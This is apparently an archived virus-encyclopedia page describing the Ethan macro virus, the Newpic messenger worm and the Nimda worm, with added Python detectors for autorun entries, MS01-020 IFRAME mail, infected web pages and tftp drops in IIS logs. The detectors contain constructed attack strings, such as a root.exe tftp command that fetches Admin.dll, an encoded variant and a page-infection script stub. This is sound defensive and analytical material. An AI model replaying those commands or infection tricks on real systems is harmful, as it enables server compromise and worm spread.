Virus Database


Macro.Word97.Ethan

Description Macro.Word97.Ethan

On the first workday of each month, before 12:00, when a document is opened, this virus displays one of the following messages:
On April 1, 1999
Y2K! Spread the word
This is not an April fools joke. I wish it were! The year 2000 is fast
approaching, and the word still needs to be spread about the
implications and dangers of the millennium bug commonly referred to as
the Y2K bug. The virus that has infected this word document was written
to help spread the word about the Y2K bug, and educate you so you can
prepare yourself and your family for Saturday, January 1, 2000. From today
until January 1, 2000, on the first business day of each month, I will
give you a lesson in Y2K preparation. Spread the word. Knowledge is
power!

On May 3, 1999
Hello again!
Let's start our first lesson to help prepare you for the millennium bug.
Although I don't personally believe there will be food shortages, power
shortages, gas shortages as a result of a computer bug, there will be
food, power and gas shortages by hoarding nitwits that fear the
millennium bug. As a result, I highly recommend that you begin to
stockpile bottled water (1-month supply), canned food (1-month supply),
and as much gas as you can store (keep your vehicle gas tank always
topped up starting December 1st). That's it for this month. See you
next month!

On June 1, 1999
How's the weather?
Right now it's pretty warm out, so you are probably not thinking much
about the winter. But remember the millennium bug is expected to hit in
the middle of winter. If you're in a northern climate, like the Great
White North (Canada), I suggest you consider purchasing a good airtight
wood stove, and at least a face cord of wood. Even if there are no
disruptions in natural gas, or oil, or electricity, the wood stove is a
great way of reducing your heating bills. And if there is a problem, you
will be comfortable in your own heated home, unlike your unprepared
neighbors (remember the Canadian ice storm last year!) That's it for
this month. See you next month!

On July 2, 1999
Did you get the stove?
Last month I recommended purchasing a gas stove to help heat your home in
the event that your supply of electricity, gas, or oil was interrupted.
This month I would like to suggest that you purchase a portable
generator and enough gas cans to store gas to power the generator. The
generator can be used to power lighting and small electrical appliances
should the power be disrupted. That's it for this month. See you next
month!

On August 2, 1999
Getting back to basics
In this installment, I would like to suggest that you consider
purchasing candles, matches, flashlights, and batteries. These items
will be invaluable during those cold, dark nights should the power
companies fail in their Y2K conversion. Don't plan on relying on the
banks or credit/debit cards. Start each month, and stash away enough
money to last you at least 2 months. This money should include enough
money to pay the rent/mortgage, utilities, FOOD, etc. Remember cold hard
cash is accepted EVERYWHERE. That's it for this month. See you next
month!

On September 1, 1999
A Limerick
The millennium's not far away
Get onto your coding today
Fix it or fudge it
The boss won't begrudge it
If everything works on the day!
That's it for this month. See you next month!

On October 1, 1999
Three months to go
Getting nervous? If you've followed my advice over the past months,
there should be nothing for you to worry about. We will survive the Y2K
bug, but preparation will ensure that if there is any Y2K crisis, it
will only be a small bump on the road, not a major pothole for you.
That's it for this month. See you next month!

On November 1, 1999
Two months to go
Personally, I don't believe that there will be a major, global Y2K
crisis. I trust the banks with my money, I trust MOST of the industrial
sector, and I trust the power and water agencies to provide me with
power and water over the infamous weekend. I even trust the Russians and
their nuclear arms! BUT you can never be too careful. Take care. Be
prepared. Use common sense. That's it for this month. See you next
month!

On December 1, 1999
Good Luck (30 days to go)
Well, this will be the final installment in the Y2K preparation lessons.
If you have followed my advice over the past few months, you will be in
excellent shape to bring in the New Year. May the New Year bring you
health and happiness. Best wishes. Bye!


I-Worm.Newpic.a

Description I-Worm.Newpic.a

This is a virus-worm that spreads over the Internet via MSN Messenger (an instant messaging program). The worm itself is a Windows EXE file about 50 KB in size, written in Visual Basic.
When an infected file is run, the worm displays the following fake message:
Error
Cannot open file. May be corupted. Replace the file with a new
one and try again.
Then it registers itself in the auto-run registry key:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
MSN Messenger = %filename%
where %filename% is the worm's full file name.
The worm then waits for incoming messages and replies with the following text:
hey, want me to send my new pic?
i took it yesterday
The worm then waits for an answer. If the user replies with one of the following words:
sure
yes
yea
guess
ok
send
maybe
go
the worm sends its EXE file to the victim, followed by one of the following randomly selected texts:
alright, here ya go
i hope you like it
there
pweese? :)
ok cool
The worm also creates the file "C:\Messenger1324\Brain1\Read Me.txt" and writes the following text to it:
I come in piece. My name is Jerry.
The purpose of me is to spread. I'm not annoying, nor dangerous.
How to remove me:
1) Click Start, select Run. The Run dialog box pops up.
2) Type: msconfig The System Configuration Utility pops up.
3) Click the Startup tab at the top. In the list, find MsgSprd, Messenger, or pic1324, uncheck, press Apply, then press Ok.
4) Restart your computer Or press Ctrl - Alt - Del, select MsgSprd from the list, then press End Task.
You may freely delete the files or the 'C:\Messenger1324' directory.

I-Worm.Nimda

Description I-Worm.Nimda

This is a virus-worm that spreads over the Internet attached to infected e-mails, copies itself to shared directories on the local network, and also attacks vulnerable IIS servers (Web sites). The worm itself is a Windows PE EXE file about 57 KB in size, written in Microsoft Visual C++.
To run from an infected message, the worm exploits a vulnerability in Internet Explorer's MIME handling (MS01-020, described below). It then installs itself on the system and runs its spreading routines and payload.
The worm contains the following "copyright" text string:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
Installing
While installing, the worm copies itself:
to the Windows directory as MMC.EXE
to the Windows system directory as RICHED20.DLL (overwriting the original Windows RICHED20.DLL) and as LOAD.EXE.
The last copy is then registered in the auto-run section of SYSTEM.INI:
[boot]
shell=explorer.exe load.exe -dontrunold
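The SYSTEM.INI shell= line above and the Run key that Newpic uses (see the I-Worm.Newpic.a description) are the two autorun locations a responder would check first on a machine of this era. The following script is an added example, not code from Virus-Database.com or from either worm: it parses a constructed SYSTEM.INI fragment and a constructed text dump of the Run key instead of reading a live machine, so it runs anywhere. The path the "MSN Messenger" value points at is an assumption; the page only says it is the worm's full file name.

```python
"""Autorun check for the two persistence points these worms use.

Added example; it is not code from Virus-Database.com or from either worm.
It parses a SYSTEM.INI fragment and a `reg query` text dump, both constructed
inline, instead of reading a live machine, so it runs anywhere.
"""
import configparser
import re

# Constructed SYSTEM.INI in the state the Nimda description gives:
# load.exe appended to the [boot] shell= line.
INFECTED_SYSTEM_INI = """[boot]
shell=explorer.exe load.exe -dontrunold
[386Enh]
device=*vmm32
"""

CLEAN_SYSTEM_INI = """[boot]
shell=explorer.exe
"""

# Constructed output of: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# The value name "MSN Messenger" is the one Newpic registers; the path it
# points at is an assumption (the page only says "the worm's full file name").
RUN_KEY_DUMP = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SystemTray       REG_SZ    SysTray.Exe
    MSN Messenger    REG_SZ    C:\Messenger1324\pic1324.exe
"""

ENTRY_RE = re.compile(r"^\s+(?P<name>.+?)\s+REG_(?:EXPAND_)?SZ\s+(?P<data>.+?)\s*$")


def shell_extra_programs(system_ini_text):
    """Programs on the [boot] shell= line other than explorer.exe.

    A clean Windows 9x/NT SYSTEM.INI has shell=explorer.exe; anything else
    on that line is started together with the shell, which is how Nimda's
    LOAD.EXE gets launched. Switches such as -dontrunold are ignored.
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(system_ini_text)
    shell_line = cp.get("boot", "shell", fallback="")
    return [tok for tok in shell_line.split()
            if tok.lower() != "explorer.exe" and not tok.startswith("-")]


def run_key_entries(reg_dump_text):
    """(value name, data) pairs parsed from `reg query` output."""
    entries = []
    for line in reg_dump_text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group("name"), m.group("data")))
    return entries


def flag_run_entries(entries, trusted_dirs=(r"c:\windows", r"c:\program files")):
    """Run entries whose target lives outside the trusted directories.

    Bare file names (SysTray.Exe) are left alone: Windows resolves them from
    the system directory. Full paths elsewhere, like the worm's copy in its
    own directory, are returned for review.
    """
    flagged = []
    for name, data in entries:
        target = data.strip('"')
        if "\\" not in target:
            continue
        if not target.lower().startswith(trusted_dirs):
            flagged.append((name, data))
    return flagged


if __name__ == "__main__":
    print("shell= extras:", shell_extra_programs(INFECTED_SYSTEM_INI))
    print("suspicious Run values:", flag_run_entries(run_key_entries(RUN_KEY_DUMP)))
```

On a real machine the two inputs would come from the actual SYSTEM.INI and from `reg query` (or `winreg` on Windows); the checks themselves do not change.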
The worm also copies itself to the Temporary directory under random MEP*.TMP and MA*.TMP.EXE names, for example:
mep01A2.TMP
mep1A0.TMP.exe
mepE002.TMP.exe
mepE003.TMP.exe
mepE004.TMP

These EXE files, like LOAD.EXE (see above), carry the Hidden and System attributes.
The worm then runs its spreading and payload routines. Depending on the Windows version, the worm attaches itself to the EXPLORER.EXE process and may run its routines as a background thread of EXPLORER.EXE.
Spreading via E-mail
To send infected messages, the worm connects to a mail server over SMTP and sends copies of itself to the victim addresses.
The worm collects victim e-mail addresses in two ways:
1. it scans *.HTM and *.HTML files for e-mail-like strings
2. it uses MAPI to connect to MS Exchange mailboxes and harvests addresses from there.
The infected messages are in HTML format and contain:
Subject: empty or random
Body: empty
Attachment: README.EXE

Subjects are taken from the name of a randomly selected file in the folder pointed to by:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal
(usually "My Documents"), or from a randomly selected file on the C: drive.
To spread from infected messages, the worm uses an IFRAME trick that exploits the vulnerability described in:
Microsoft Security Bulletin (MS01-020): Incorrect MIME Header Can Cause IE to Execute E-mail Attachment http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
Download patch:
http://www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp
What causes the vulnerability?
If an HTML mail contains an executable attachment, whose MIME type is incorrectly given as one of several unusual types, a flaw in IE will cause the attachment to be executed without displaying a warning dialogue.
What does the patch do?
The patch eliminates the vulnerability by correcting the table of MIME types and their associated actions in IE. This has the effect of preventing e-mails from being able to automatically launch executable attachments.
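The MS01-020 trick leaves a recognisable shape in the stored message: an HTML body whose IFRAME references an attachment by cid:, and that attachment declared under an inline-safe Content-Type (audio, image, text, video) while its name or its first bytes say it is an executable. The checker below is an added example, not code from Virus-Database.com or from the worm. The sample message is constructed in that shape; its attachment is a 64-byte stub beginning with "MZ", not worm code, and the audio/x-wav type on it is one of the "unusual types" the bulletin refers to, used here as an assumption about the exact value.

```python
"""Flag the MS01-020 IFRAME/MIME trick in a stored .EML or .NWS message.

Added example; not code from Virus-Database.com or from the worm. The sample
message is constructed in the shape the page describes; the attachment is a
64-byte "MZ" stub, not worm code.
"""
import base64
import email
import re
from email import policy

EXEC_EXTS = (".exe", ".scr", ".pif", ".com", ".bat", ".vbs", ".dll")
# Top-level types IE treated as safe to open inline; an attachment declared
# this way but carrying a PE image is the MS01-020 pattern.
INLINE_TOP_TYPES = ("audio", "image", "video", "text")

IFRAME_CID_RE = re.compile(r"<iframe[^>]+src\s*=\s*[\"']?cid:", re.I)

FAKE_EXE_B64 = base64.b64encode(b"MZ" + b"\x00" * 62).decode()

# Constructed message: HTML part with a hidden IFRAME pulling the attachment,
# attachment declared as audio/x-wav but named readme.exe and starting with MZ.
SAMPLE_EML = f"""From: someone@example.org
To: victim@example.org
Subject: report
MIME-Version: 1.0
Content-Type: multipart/related; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit

<html><body><iframe src="cid:part1" height="0" width="0"></iframe></body></html>
--BOUNDARY
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <part1>

{FAKE_EXE_B64}
--BOUNDARY--
"""

# Constructed benign message for comparison.
CLEAN_EML = """From: someone@example.org
To: victim@example.org
Subject: report
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

Nothing to see here.
"""


def ms01_020_findings(eml_text):
    """Return the reasons the message looks like the IFRAME/MIME trick.

    Per part, two independent signals are checked: an executable file name
    or a PE header hiding under an inline-safe Content-Type, and an HTML
    body that loads a cid: attachment through an IFRAME. An empty list
    means nothing matched.
    """
    msg = email.message_from_string(eml_text, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        top = ctype.split("/")[0]
        if ctype == "text/html":
            if IFRAME_CID_RE.search(part.get_content()):
                findings.append("html body: IFRAME loads a cid: attachment")
            continue
        name = (part.get_filename() or "").lower()
        data = part.get_payload(decode=True) or b""
        if name.endswith(EXEC_EXTS) and top in INLINE_TOP_TYPES:
            findings.append(f"attachment {name}: executable name declared as {ctype}")
        if data.startswith(b"MZ") and top in INLINE_TOP_TYPES:
            findings.append(f"attachment {name or '<unnamed>'}: PE header under {ctype}")
    return findings


if __name__ == "__main__":
    for finding in ms01_020_findings(SAMPLE_EML):
        print(finding)
```

Run over the .EML and .NWS files the worm scatters across shared directories, this is enough to separate its copies from ordinary saved mail; checking the payload bytes as well as the declared name catches renamed copies such as the PUTA!!.SCR variant.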
Spreading via the local network
The worm scans local and shared (mapped) remote drives in three different manners and infects every accessible directory it finds.
It infects in two ways:
1. It creates .EML (95% of the time) or .NWS (5%) files with randomly selected names. As a result, these EML and NWS files are everywhere on an infected machine (and in the local network), and there may be thousands of them. These files contain the worm's copy in e-mail form.
The e-mail form is an HTML e-mail message with the worm's copy in a MIME envelope, and with an IFRAME trick as described above. Upon being opened, this message immediately infects a vulnerable machine.
2. The worm looks for file name + extension combinations:
*DEFAULT* , *INDEX* , *MAIN* , *README* + .HTML, .HTM, .ASP
(*NAME* means NAME may appear as a substring of the file name)
If such a file is found, the worm copies itself in e-mail form to that directory as README.EML and appends to the HTM/HTML/ASP file a JavaScript program that simply opens README.EML when the page is opened, activating the worm.
As a result, the worm infects Web pages and may spread to machines that visit these Web sites.
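A scanner for this second infection method needs two pieces: the file-name rule the worm applies, and a check for an appended script that opens a .EML file. The script below is an added example, not code from Virus-Database.com or from the worm. The name rule is the one given above (the stem may be a substring, so domain.asp qualifies as well as main.asp). The appended script in the constructed infected page is a stand-in that does what the description says, open README.EML; its exact arguments are an assumption.

```python
"""Find Nimda-style web-page infection under a local document root.

Added example; not code from Virus-Database.com or from the worm. The
file-name rule is the one the page gives; the appended script in the
constructed infected page is a stand-in whose exact arguments are assumed.
"""
import re
import tempfile
from pathlib import Path

NAME_STEMS = ("default", "index", "main", "readme")
WEB_EXTS = (".html", ".htm", ".asp")
WORM_EML_NAMES = ("readme.eml", "readme.nws")

SCRIPT_RE = re.compile(r"<script[^>]*>(?P<body>.*?)</script>", re.I | re.S)
OPEN_EML_RE = re.compile(r"window\.open\s*\(\s*[\"'][^\"']*\.eml[\"']", re.I)

# Constructed pages: a clean one, and the same page with a script appended
# after the closing </html>, as the description says the worm does.
CLEAN_PAGE = "<html><body><h1>Welcome</h1></body></html>\n"
INFECTED_PAGE = CLEAN_PAGE + (
    '<html><script language="JavaScript">'
    'window.open("readme.eml", null, "resizable=no,top=6000,left=6000")'
    "</script></html>"
)


def is_nimda_target(filename):
    """True if the worm's name rule would pick this file for infection.

    Substring matching is deliberate: it mirrors the *MAIN* wildcard in the
    description, so domain.asp qualifies as well as main.asp.
    """
    lower = Path(filename).name.lower()
    return lower.endswith(WEB_EXTS) and any(s in lower for s in NAME_STEMS)


def infected_script(html_text):
    """The inline <script> element that opens a .eml file, or None."""
    for m in SCRIPT_RE.finditer(html_text):
        if OPEN_EML_RE.search(m.group("body")):
            return m.group(0)
    return None


def scan_web_root(root):
    """(relative path, reason) for every worm artefact found under root."""
    root = Path(root)
    hits = []
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = str(p.relative_to(root))
        if p.name.lower() in WORM_EML_NAMES:
            hits.append((rel, "worm copy in e-mail form"))
        elif p.name.lower().endswith(WEB_EXTS):
            if infected_script(p.read_text(errors="replace")):
                hits.append((rel, "script opens a .eml file"))
    return hits


def demo():
    """Build a constructed document root in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "index.html").write_text(INFECTED_PAGE)
        Path(d, "about.html").write_text(CLEAN_PAGE)
        Path(d, "README.EML").write_text("(stand-in for the worm's .EML copy)")
        return scan_web_root(d)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

The script check is applied to every web file, not only those matching the name rule: once a page is infected it stays dangerous whatever it is called, and a variant may change the names it targets.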
Spreading as an IIS attack
To upload its file to a victim machine, the worm issues a "tftp" command on the victim and starts a temporary TFTP server on the infected (current) machine to answer the victim's "get" request, in exactly the same way as the BlueCode (IISWorm.BlueCode) IIS worm.
The file uploaded to the victim machine is named ADMIN.DLL.
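Because the tftp command is passed to the victim inside an HTTP request, the IIS log on an attacked server records it, URL-encoded, in the cs-uri-query field. The detector below is an added example, not code from Virus-Database.com or from the worm. The log lines are constructed; their field layout follows the #Fields header an IIS 5 server writes, the dropped-file names are the ones this page gives (ADMIN.DLL, and HTTPODBC.DLL and COOL.DLL for Nimda.e), and the request path that carries the command is an assumption. The last sample line shows why decoding is repeated: a doubly-encoded %2574ftp hides "tftp" from a single-pass filter.

```python
"""Spot the worm's tftp drop in IIS W3C extended logs.

Added example; not code from Virus-Database.com or from the worm. The log
lines are constructed; the request path carrying the command is assumed,
the dropped-file names are the ones the page gives.
"""
from urllib.parse import unquote

DROPPED_NAMES = ("admin.dll", "httpodbc.dll", "cool.dll")

# Constructed IIS 5 log. Line 2 carries the tftp fetch in plain %20 encoding;
# line 4 carries the same thing doubly encoded (%25 is the percent sign).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:22:01 10.0.0.5 GET /index.asp - 200
2001-09-18 13:22:03 10.0.0.9 GET /scripts/root.exe /c+tftp%20-i%2010.0.0.9%20GET%20Admin.dll%20c:\\Admin.dll 200
2001-09-18 13:22:04 10.0.0.5 POST /login.asp - 302
2001-09-18 13:22:06 10.0.0.9 GET /scripts/root.exe /c+%2574ftp%2520-i%252010.0.0.9%2520GET%2520cool.dll 200
"""


def decode_fully(s, rounds=5):
    """Percent-decode until the string stops changing (bounded)."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in #Fields."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line; skip rather than misalign fields
        yield dict(zip(fields, values))


def nimda_tftp_hits(text):
    """(client IP, decoded request) for requests that run tftp to fetch a dropped DLL.

    Decoding is repeated because IIS logs the raw query and %25 lets an
    attacker hide 'tftp' from a filter that decodes only once.
    """
    hits = []
    for req in parse_w3c(text):
        raw = req.get("cs-uri-stem", "") + " " + req.get("cs-uri-query", "")
        low = decode_fully(raw).replace("+", " ").lower()
        if "tftp" in low and any(n in low for n in DROPPED_NAMES):
            hits.append((req["c-ip"], low))
    return hits


if __name__ == "__main__":
    for ip, request in nimda_tftp_hits(SAMPLE_LOG):
        print(ip, request)
```

The same parser can be pointed at a real ex*.log file; the only field names the detector relies on are c-ip, cs-uri-stem and cs-uri-query.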
Payloads
The payload routine adds the "Guest" user to the Administrators group (as a result, the "Guest" account has full access to the infected machine).
The worm also opens all local drives for sharing.
There are several variants of the "Nimda" worm.
All of them are very close to the original; most are just "patched" versions of the original worm, with the text strings in the worm body replaced by other strings.
Nimda.b
This is the original "Nimda" worm compressed with the PCShrink Win32 PE EXE compressor. The strings:
README.EXE , README.EML
are replaced with:
PUTA!!.SCR , PUTA!!.EML
Nimda.c
This is exactly the original "Nimda" worm, compressed with UPX.
Nimda.d
This variant of the worm was released onto the Internet at the end of October 2001. It spreads in PECompact-compressed form, 27 KB in size.
The only difference from the original worm is the "copyright" text string, which in this version is patched to:
HoloCaust Virus.! V.5.2 by Stephan Fernandez.Spain
Nimda.e
This is a recompiled "Nimda" variant with several minor routines slightly fixed or optimized. It was found in the wild at the end of October 2001.
The visible differences from the original worm are:
The attached file name:
SAMPLE.EXE (instead of README.EXE)
The DLL files are:
HTTPODBC.DLL and COOL.DLL (instead of ADMIN.DLL)
The "copyright" text is replaced with:
Concept Virus(CV) V.6, Copyright(C)2001, (This's CV, No Nimda.)

    Copyright © 2005 Virus-Database.com